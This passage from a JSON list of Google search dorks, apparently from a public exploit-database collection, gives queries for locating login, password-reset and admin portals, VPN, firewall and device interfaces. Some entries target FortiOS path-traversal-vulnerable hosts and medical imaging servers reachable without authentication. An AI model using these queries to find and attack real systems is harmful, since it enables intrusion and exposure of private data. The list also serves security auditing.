"description": "Login Pages:\r\n\r\nsite:mail.*.*/auth\r\nsite:login.*.*/auth\r\nsite:signin.*.*/auth\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/pages/login.php intitle:\"Login\"", "description": "Login Pages:\r\n\r\nsite:*/pages/login.php intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/en/login/", "description": "Login Pages:\r\n\r\nsite:*/en/login/\r\n\r\nReza Abasi"}, {"dork": "site:vpn.*.*/ intitle:\"login\"", "description": "VPN Login Pages:\r\n\r\nsite:vpn.*.*/ intitle:\"login\"\r\n\r\nReza Abasi"}, {"dork": "site:*/index.php/login intitle:\"login\"", "description": "Login Page:\r\n\r\nsite:*/index.php/login intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Login page\" intext:\"about SurgeMail\"", "description": "Login Page:\r\n\r\nintitle:\"Login page\" intext:\"about SurgeMail\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi/user.cgi", "description": "Login Page:\r\n\r\nsite:*/cgi/user.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Webmail/", "description": "Login Page:\r\n\r\nsite:*/Webmail/\r\nsite:Webmail.*.*/owa/\r\nsite:Webmail.*.*/ intitle:\"login\"\r\nsite:webmail.*.* intitle:\"Webmail Login\"\r\nsite:mail.*.* intitle:\"login\"\r\n\r\nReza Abasi"}, {"dork": "intitle:\"Local Run Manager\" intext:\"Local Run Manager Version:\"", "description": "Dork: intitle:\"Local Run Manager\" intext:\"Local Run Manager Version:\"\r\n\r\nAuthor: M. Cory Billington\r\n\r\nInfo: Web portals for Local Run Manager software from Illumina"}, {"dork": "site:identity.*.*/login", "description": "Login Page:\r\n\r\nsite:identity.*.*/login\r\nsite:imap.*.*/login\r\nsite:smtp.*.*/login\r\nsite:store.*.*/login\r\nmy.*.*/login\r\nsite:management.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:please login inurl:remote/login intext:FortiToken", "description": "Fortinet (FortiToken Mobile OTP auth application) login pages\r\n\r\n# Google Dorks: \r\nintitle:please login inurl:remote/login intext:FortiToken\r\nintitle:please login inurl:remote/login intext:FortiClient\r\nintext:Please Login SSL VPN inurl:remote/login intext:FortiClient\r\nintext:Please Login SSL VPN inurl:remote/login intext:FortiToken\r\n\r\n# Date: [21-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*/Password.aspx", "description": "Reset Password Page:\r\n\r\nsite:*/Password.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forgetpassword.php", "description": "Login Page and Reset password Page:\r\n\r\nsite:*/forgetpassword.php\r\nsite:*/login/forget_password.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:dotCMS inurl:dotAdmin", "description": "DotCMS login pages\r\n\r\n# Google Dork: intitle:dotCMS inurl:dotAdmin\r\n# Date: [22-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:synology intext:\"Choose login account:\"", "description": "NAS Device login\r\n\r\n# Google Dork: intitle:synology intext:\"Choose login account:\"\r\n# Date: [22-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*.*.*/authentication/Logon", "description": "Login Pages:\r\n\r\nsite:*.*.*/authentication/Logon\r\nsite:*.*.*/authentication intitle:\"sign in\"\r\nsite:authentication.*.*/login\r\n\r\nReza Abasi"}, {"dork": "site:secure.*.* intitle:\"log in\"", "description": "Login Portal:\r\n\r\nsite:secure.*.* intitle:\"log in\"\r\nsite:secure.*.* intitle:\"sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:sts.*.*/adfs/ls/?SAMLRequest= intitle:\"sign in\"", "description": "Login Page:\r\n\r\nsite:sts.*.*/adfs/ls/?SAMLRequest= intitle:\"sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/web-hosting/cplogin", "description": "login page:\r\n\r\nsite:*/web-hosting/cplogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/?action=login\" intitle:\"Log In\"", "description": "Login Portal:\r\n\r\ninurl:\"/?action=login\" intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/EasyPAY/view", "description": "Payroll management login pages\r\n\r\n# Google Dork: inurl:/EasyPAY/view\r\n# Date: [23-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*/account-sign-in", "description": "Login Portal:\r\n\r\nsite:*/account-sign-in\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/login/ForgotPassword", "description": "Login for password reset:\r\n\r\nsite:*/login/ForgotPassword\r\nsite:*/login/pw/request\r\nsite:*/login/forgot-password\r\n/login/forgot\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:admin.*.*/forgot?username=", "description": "Login for password reset:\r\n\r\nsite:admin.*.*/forgot?username=\r\nsite:*/admin/password/reset\r\nsite:*/admin/login/forgot\r\nsite:*/admin/pass\r\nsite:*/admin/password/\r\ninurl:\"/index.php/lostpassword/\"\r\ninurl:\"index.php?login/forgot_password\"\r\nsite:*/auth/v2/login/password_reset\r\nsite:*/seller/forgot/\r\nsite:*/recoverpassword\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-login?redirect_to= intitle:\"login\"", "description": "Login Page:\r\n\r\nsite:*/wp-login?redirect_to= intitle:\"login\"\r\ninurl:/wordpress/wp-login?action=lostpassword -site:stackexchange.com\r\ninurl:\"/wp-login.php?redirect_to=\" intitle:\"Log In\"\r\ninurl:\"/wp-login.php?action=lostpassword\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/identify/ intitle:\"Forgotten Password\"", "description": "Login Pages:\r\n\r\ninurl:/identify/ intitle:\"Forgotten Password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admincp/ intitle:\"Admin Cp\"", "description": "Login Portal:\r\n\r\nsite:*/admincp/ intitle:\"Admin Cp\"\r\nsite:*/admincp/login.php\r\nsite:*/UserCP intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/password/", "description": "Login Page:\r\n\r\nsite:*/user/password/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/index.php/admin/ intitle:\"login\"", "description": "Login Portal:\r\n\r\ninurl:/index.php/admin/ intitle:\"login\"\r\ninurl:/index.php/admin-login/ intitle:\"Admin login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:ftp://ftp.*.*/login -inurl:https://", "description": "Login Portals:\r\n\r\nsite:ftp://ftp.*.*/login -inurl:https://\r\n\r\nReza ABasi(Turku)"}, {"dork": "site:*/securelogin.asp", "description": "Login Portal:\r\n\r\nsite:*/securelogin.asp\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authlogin/ intitle:login", "description": "Login Portal:\r\n\r\nsite:*/authlogin/ intitle:login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/exchange-login/ intitle:\"Login\"", "description": "Login Pages:\r\n\r\nsite:*/exchange-login/ intitle:\"Login\"\r\nsite:*exchange.*/login\r\nsite:exchange.*.*/login.aspx\r\nintitle:\"Exchange LogIn\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/m-login.html", "description": "Login Portal:\r\n\r\nsite:*/m-login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Security/Login", "description": "Login Portal:\r\n\r\nsite:*/Security/Login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/updatepassword.php", "description": "Login Portal:\r\n\r\nsite:*/updatepassword.php\r\nsite:*/lost-password\r\nsite:*/changepassword.php\r\nsite:*/forgotpw.php\r\nsite:*/reset-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/validar_usuario.php", "description": "Login Portal:\r\n\r\nsite:*/validar_usuario.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Login to Webmin\" intext:\"You must enter a username and password to login to the server\"", "description": "Dork: intitle:\"Login to Webmin\" intext:\"You must enter a username and\r\npassword to login to the server\"\r\n\r\nAuthor: M. Cory Billington (@_th3y)\r\n\r\nInfo: WebMin Login portals"}, {"dork": "site:monitor.*.*/login intitle:\"Login\"", "description": "Login Portal:\r\nsite:monitor.*.*/login intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:management.*.*/login/", "description": "Login Portal:\r\n\r\nsite:management.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:moodle.*.*/login", "description": "Login Portal:\r\n\r\nsite:moodle.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/SendPassword", "description": "Login Portal:\r\nsite:*/SendPassword\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:intranet.*.*/login/", "description": "Login Portal:\r\n\r\nsite:intranet.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:admin/changepassword*", "description": "Google Dork: \r\ninurl:admin/changepassword*\r\ninurl:admin/resetpassword*\r\n\r\nCategory: Pages Containing Login Portals\r\nDescription: This Dork will find 'change-password' pages.\r\n\r\n(Note: Platform Not Matters && i.e .php, .aspx, .net etc..)\r\n\r\n\r\nAuthor:Abhishek Samaddar"}, {"dork": "site:*/password_reset/", "description": "Login Portal:\r\n\r\nsite:*/password_reset/\r\nsite:*/password/reset\r\nsite:*/passwordrecovery\r\nsite:*/resetpassword.html\r\nsite:*/user/request-password-reset/\r\nsite:*/resetpass.html\r\nsite:*/forum/reset intitle:\"Reset Password\"\r\nsite:*/PasswordReset.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8000/login#forgot intitle:\"login\"", "description": "Login portal:\r\n\r\nsite:*:8000/login#forgot intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:auth.*.*/signin", "description": "Login Portal:\r\n\r\nsite:auth.*.*/signin\r\nsite:*/auth/login intitle:\"signin\"\r\nsite:*/auth.php\r\nsite:signin.*.* intitle:\"signin\" -facebook.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forgot-password", "description": "Login Portals:\r\n\r\nsite:*/forgot-password\r\nsite:*/password-forget\r\ninurl:\"/?forgot_password=yes\"\r\nsite:*/password-recovery\r\ninurl:\"wp-login.php?action=lostpassword\"\r\nsite:*/auth/reset_password/\r\nsite:*/login/# intext:\"Reset Password\"\r\nsite:*/forgot\r\ninurl:\"/forgotpassword.jsp?locale=us\"\r\nsite:*/passwordReset\r\nsite:*/pwdreset\r\nsite:*/login/reset.html\r\ninurl:\"forgotmypassword.html\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/resetpassword.php", "description": "To View ResetPassword Portals of various websites\r\n*Dork: site:*/resetpassword.php*\r\n*Author: Paras Arora*\r\n*Date: 3rd September 2019 *\r\n*Category: Pages Containing Reset Portals*"}, {"dork": "inurl:show_port_res_settings", "description": "Google Dork Submission for finding Mitel Audio and Web Conferencing login pages.\r\n\r\nAuthor name: MiningOmerta"}, {"dork": "site:exchange.*.*/owa/", "description": "Login Portal:\r\n\r\nsite:exchange.*.*/owa/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:remote.*.* intitle:\"User Authentication\"", "description": "Login portal:\r\n\r\nsite:remote.*.* intitle:\"User Authentication\"\r\nintitle:\"User Authentication\" site:*/sslvpn_logon.shtml\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/awcuser*", "description": "An additional dork for finding Mitel login screens, previous presentations, and documents.\r\n\r\nAuthor Name: MiningOmerta"}, {"dork": "intitle:login enterprise", "description": "Enterprise login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "site:*/recover-pass", "description": "Login Portal:\r\n\r\nsite:*/recover-pass\r\nsite:*/users/recover_password\r\nsite:controlpanel.*.*/recover.cgi\r\ninurl:\"/login/#forgotpin\"\r\nsite:*/password/email\r\ninurl:\"/plug.php?e=passrecover\"\r\ninurl:\"/index.php?action=recover_password\"\r\nsite:*/password/new\r\nsite:*/reminder.php\r\nsite:cpanel.*.* inurl:\"/resetpass?start=1\"\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:smtp.*.*/login", "description": "Login Portal:\r\n\r\nsite:smtp.*.*/login\r\nsite:owa.*.*/login\r\nsite:controlpanel.*.*/login\r\nsite:pop.*.*/login\r\nsite:ww1.*.*/login\r\nsite:support.*.*/login\r\nsite:app.*.*/login\r\nsite:*/Admin/Login/\r\nsite:auth.*.*/login\r\nsite:imap.*.* intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:dev.*.*/signin", "description": "Google Dork Submission for finding developers login pages for various places.\r\n\r\nsite:dev.*.*/signin\r\nsite:account.*.*/signin\r\n\r\nAuthor: MiningOmerta"}, {"dork": "site:app.*.*/ intext:login", "description": "#Google Dork for more login pages, sometimes for internal apps.\r\n\r\n\r\n#Author: MiningOmerta"}, {"dork": "site:*/nms/login intitle:\"UNMS\"", "description": "Login Portal:\r\n\r\nsite:*/nms/login intitle:\"UNMS\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/phpmyadmin/user_password.php\" -inurl:git", "description": "Login Portal:\r\n\r\ninurl:\"/phpmyadmin/user_password.php\" -inurl:git\r\nsite:*/phpmyadmin/sql.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/SecureAuth.aspx\"", "description": "Login Portal:\r\n\r\ninurl:\"/SecureAuth.aspx\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"XENON :: Login\"", "description": "Login Portal:\r\n\r\nintitle:\"XENON :: Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/index_signin.php", "description": "Login Portal:\r\n\r\nsite:*/index_signin.php\r\nsite:*/sign-in intitle:\"Sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authUpdate intitle:\"Account Access Help\"", "description": "Login Portal:\r\n\r\nsite:*/authUpdate intitle:\"Account Access Help\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/usp-core/app/authUpdate\"", "description": "Login Portal:\r\n\r\ninurl:\"/usp-core/app/authUpdate\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8443/login_up.php", "description": "Google Dork Submission to find login pages for Plesk Onyx sites, usually ftp servers.\r\n\r\nhttps://www.google.com/search?q=site:*:8443/login_up.php\r\n\r\nAuthor: MiningOmerta"}, {"dork": "intext:\"Please log on to use the mikrotik hotspot service\" intitle:\"mikrotik hotspot >login\" -github -site:mikrotik.com", "description": "mikrotik hotspot login:\r\n\r\nintext:\"Please log on to use the mikrotik hotspot service\"\r\nintitle:\"mikrotik hotspot >login\" -github -site:mikrotik.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:cpanel.*.* intitle:\"login\" -site:forums.cpanel.net", "description": "Login Portal:\r\n\r\nsite:cpanel.*.* intitle:\"login\" -site:forums.cpanel.net\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"login\" site:welcome.*.*", "description": "Login Portal:\r\n\r\nintitle:\"login\" site:welcome.*.*\r\nsite:email.*.* intitle:\"login\"\r\nsite:host.*.* intitle:\"login\"\r\nsite:mailserver.*.* intitle:\"login\"\r\nsite:ns.*.* intitle:\"login\"\r\nsite:ns1.*.* intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/casAuthn/login.php", "description": "Login Page:\r\n\r\nsite:*/casAuthn/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authzssl/forget_password", "description": "Login Portal:\r\n\r\nsite:*/authzssl/forget_password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:* intitle:\"reset password\"", "description": "*DORK: *site:* intitle:\"reset password\"\r\n*AUTHOR: Paras Arora(PAC Security)*\r\n*DATE: 17 September 2019*\r\n*Category: reset password portals*"}, {"dork": "inurl:webmail/src/login.php", "description": "SquirrelMail - Login portal:\r\n\r\ninurl:webmail/src/login.php\r\n\r\n\r\nSravan7s"}, {"dork": "inurl:\"/prweb/prwebLDAP1/\"", "description": "Pega systems: login portal\r\n\r\ninurl:\"/prweb/prwebLDAP1/\"\r\n\r\nSravan7s"}, {"dork": "site:*/oauth2/authorize", "description": "Login Portal:\r\n\r\nsite:*/oauth2/authorize\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/pwdform.htm", "description": "Login Portal:\r\n\r\nsite:*/pwdform.htm\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-admin/user-edit.php", "description": "Login Portal:\r\n\r\nsite:*/wp-admin/user-edit.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/dana-na/ filetype:cgi", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:*/request-password-reset", "description": "Login Portals:\r\n\r\nsite:*/request-password-reset\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/preferences", "description": "Login Portal:\r\n\r\nsite:*/account/preferences\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"apex/f?p=\"", "description": "Login portals"}, {"dork": "site:*/oauth/authenticate", "description": "Login Portal:\r\n\r\nsite:*/oauth/authenticate\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?route=account/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?route=account/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?gt=member/login\"", "description": "Login POrtal:\r\n\r\ninurl:\"/index.php?gt=member/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?r=site/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?r=site/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php/site/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php/site/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/userlogin", "description": "Login Portal:\r\n\r\ninurl:/userlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/customerlogin", "description": "Login Portal:\r\n\r\ninurl:/customerlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/clientlogin", "description": "Login Portals:\r\n\r\ninurl:/clientlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/studentlogin", "description": "Login Portal:\r\n\r\ninurl:/studentlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/stafflogin", "description": "Login POrtal:\r\n\r\ninurl:/stafflogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/usercp.php", "description": "Login Portal:\r\n\r\nsite:*/usercp.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?page=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?page=login\"\r\ninurl:\"/index.php?page=changepass\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/loginportal/ intitle:\"login\"", "description": "Login Portal:\r\n\r\nsite:*/loginportal/ intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?action=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?action=login\"\r\ninurl:\"/index.php?section=login\"\r\ninurl:\"/index.php/login?view=reset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/password/remind", "description": "Login Portal:\r\n\r\nsite:*/password/remind\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"BasicAuthenticator:LOCAL\"", "description": "Login portals."}, {"dork": "inurl:\"/showLogin.cc?isMobile=false\"", "description": "Login portals"}, {"dork": "site:*/Dashboard/ intitle:\"login\"", "description": "Login Portals:\r\n\r\nsite:*/Dashboard/ intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:watch.*.*/login", "description": "Login Portal:\r\n\r\nsite:watch.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"API Publisher- Login\"", "description": "Dork: intitle:\"API Publisher- Login\"\r\n\r\nAuthor: M. Cory Billington (@_th3y)\r\n\r\nInfo: WSO2 Login portals"}, {"dork": "site:passport.*.*/login", "description": "Login Portal:\r\n\r\nsite:passport.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/lost_password", "description": "Login Portal:\r\n\r\nsite:*/account/lost_password\r\nsite:*/account/forgot-password\r\nsite:*/account/request-password-reset\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/wp-login.php?action=lostpassword\"", "description": "Login Portal:\r\n\r\ninurl:\"/wp-login.php?action=lostpassword\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Pandora FMS mobile\"", "description": "# Dork #\r\n\r\nintitle:\"Pandora FMS mobile\"\r\n\r\nLogin Portals."}, {"dork": "site:*/cb-forgot-login", "description": "Login POrtal:\r\n\r\nsite:*/cb-forgot-login\r\n\r\nReza Abasi(Turku)"}, {"dork": "redash inurl:/org_slug", "description": "Redash Dashboard logins\r\n\r\n# Google Dork: redash inurl:/org_slug\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:/webconsole/webpages/login.jsp", "description": "Sophos XG Firewall Login pages\r\n\r\n# Google Dork: inurl:/webconsole/webpages/login.jsp\r\n# Date: [5-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:.elasticbeanstalk.com/admin", "description": "Application on AWS Elasticbeanstalk\r\n\r\n# Google Dork: inurl:.elasticbeanstalk.com/admin\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:Metabase inurl:/dash", "description": "Metabase Dashboard Queries\r\n\r\n# Google Dork: intitle:Metabase inurl:/dash\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"/password.php\" intitle:\"Forgot your password\"", "description": "Login Portal:\r\n\r\ninurl:\"/password.php\" intitle:\"Forgot your password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/reset", "description": "Login Portal:\r\n\r\nsite:*/account/reset\r\nsite:*/auth/forgot_password\r\nsite:*/account/resetpassword\r\nsite:*/accountrecoveryendpoint/recoverypassword.do\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-bin/luci intext:\"Authorization Required\"", "description": "Login Portal:\r\n\r\nsite:*/cgi-bin/luci intext:\"Authorization Required\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth_index.htm?lang=kr&loginvalue=0&port=0", "description": "Samsung DVR web viewer login portal:\r\n\r\nsite:*/auth_index.htm?lang=kr&loginvalue=0&port=0\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/Admin/Forget.php\"", "description": "Login Portal:\r\n\r\ninurl:\"/Admin/Forget.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin/password/reset", "description": "Login POrtal:\r\n\r\nsite:*/admin/password/reset\r\nsite:*/admin/password-recovery/\r\nsite:*/password_reset/new\r\ninurl:\"/pages/reset_password.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?title=Special:Userlogin\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?title=Special:Userlogin\"\r\ninurl:\"/index.php?title=Special:PasswordReset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?content=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?content=login\"\r\ninurl:\"/index.php?content=forgot\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?p=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?p=login\"\r\ninurl:\"/index.php?p=password_reset\"\r\ninurl:\"/index.php?p=forgot\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?pageID=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?pageID=login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php/main/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php/main/login\"\r\ninurl:\"/index.php/Main/Forgot_Password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:odoo inurl:login \"powered by odoo\" \"manage databases\"", "description": "intitle:odoo inurl:login \"powered by odoo\" \"manage databases\"\r\n\r\nDan Kritzinger"}, {"dork": "inurl:login.jsp intitle:login", "description": "*Google Dork:* inurl:login.jsp intitle:login\r\n*Description:* Pages Containing Login Portals\r\n*Author:* shivaGprasadh"}, {"dork": "site:*/my.policy", "description": "#Author: MiningOmerta\r\n#Google Dork Submission\r\n#This takes you to some log-in pages, some to logged-out pages, and others to juicy info.\r\n\r\n\r\nsite:*/my.policy"}, {"dork": "intitle:\"TMSoft MyAuth Gateway 3\" -DOWNLOAD", "description": "Dork for search any pages of MyAuth software"}, {"dork": "intitle:MK-AUTH :: CONTEUDO RESTRITO -site:mk-auth.com.br", "description": "Dork for search any mkauth pages"}, {"dork": "inurl:10443/remote/login", "description": "Dork for find any pages with the FortiOS Path Traversal vulnerability"}, {"dork": "intext:\"civicplus\" \"Login\"", "description": "Login pages to government websites using CivicPlus\r\n\r\nZerconil"}, {"dork": "site:*/siteminderagent/forms/login.fcc", "description": "Login Portal:\r\n\r\nsite:*/siteminderagent/forms/login.fcc\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"Service provided by Horos.\"", "description": "# Google Dork : intext:\"Service provided by Horos.\"\r\n# Description: Find websites with medical information about people, such as x-rays. Some logins are without authentication.\r\n# Category : Files Containing Juicy Info\r\n# Date : 17/12/2019\r\n# Author : Leandro Naranjo\r\n# Social: @tw1_lea"}, {"dork": "inurl:/login.aspx site:com.tr intitle:y\u00f6netim", "description": "Google Dork : inurl:/login.aspx site:com.tr intitle:y\u00f6netim\r\n\r\nThis one is finding some important login panel in my country . You can\r\nchange \"y\u00f6netim\" to \"management\" on global searching."}, {"dork": "intitle:\"Pfsense - Login\"", "description": "Google Dork : intitle:\"Pfsense - Login\"\r\n\r\nThis dork found pfsense login panel.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"WHMCS - Login\" inurl:/admin/login.php", "description": "Google Dork : intitle:\"WHMCS - Login\" inurl:/admin/login.php\r\n\r\nThis dork finding some useful login page.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"WebSite X5 Manager\" inurl:/admin/login.php", "description": "Google Dork: intitle:\"WebSite X5 Manager\" inurl:/admin/login.php\r\nThis dork find some X5 website manager login page.\r\n\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "inurl:admin/login.php?login= intitle:\"CMS\"", "description": "Google Dorks: \r\ninurl:admin/login.php?login= intitle:\"CMS\"\r\ninurl:admin/login.php?login= intitle:\"Dashboard\"\r\n\r\nThis dork finding some useful cms login page.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"Check Point - Login\"", "description": "intitle:\"Check Point - Login\"\r\n\r\nThis dork found checkpoint login panel.\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "inurl:\"/webis/webis_login.html\"", "description": "inurl:\"/webis/webis_login.html\"\r\n\r\nThis dork found checkpoint login panel.\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "intitle:\"Zabbix\" intext:\"username\" intext:\"password\" inurl:\"/zabbix/index.php\"", "description": "Zabbix Login Portal:\r\n\r\nintitle:\"Zabbix\" intext:\"username\" intext:\"password\"\r\ninurl:\"/zabbix/index.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?reconnect=1\"", "description": "Zabbix Login Portal:\r\n\r\ninurl:\"/index.php?reconnect=1\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\":8080/login\"", "description": "Login Portal:\r\n\r\ninurl:\":8080/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"LABVANTAGE Logon\"", "description": "Login Portal:\r\n\r\nintitle:\"LABVANTAGE Logon\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi/domadmin.cgi", "description": "Login Portal:\r\n\r\nsite:*/cgi/domadmin.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\":8080/login.jsp?os_destination=\"", "description": "Login Portal:\r\n\r\ninurl:\":8080/login.jsp?os_destination=\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"powered by codoforum\" inurl:\"/user/login\"", "description": "Find forum websites powered by\r\n\r\ncodoforum\r\n\r\nintext:\"powered by codoforum\" inurl:\"/user/login\"\r\nintext:\"Powered by Codoforum\""}, {"dork": "intitle:\"webview login\" alcatel lucent", "description": "Alcatel-Lucent devices\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "site:*/AdminPanel.php", "description": "Login Portal:\r\n\r\nsite:*/AdminPanel.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:memberlogin.php", "description": "Login Portal:\r\n\r\ninurl:memberlogin.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Sign in\" site:*/idaas/", "description": "Login Portal:\r\n\r\nintitle:\"Sign in\" site:*/idaas/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:check_mk/login.py", "description": "Dork for search Checkmk login pages:\r\n\r\nCheckmk has long been available as an open source IT monitoring solution, supported by a large user community\r\n\r\nweb:https://checkmk.com/\r\n[https://checkmk.com/images/apple-touch-icon.png]\r\nInfrastructure\r\n & Application Monitoring | checkmk\r\nCheckmk\r\n is a leading tool for Infrastructure & Application Monitoring. Simple configuration, scalable, flexible. Open Source and 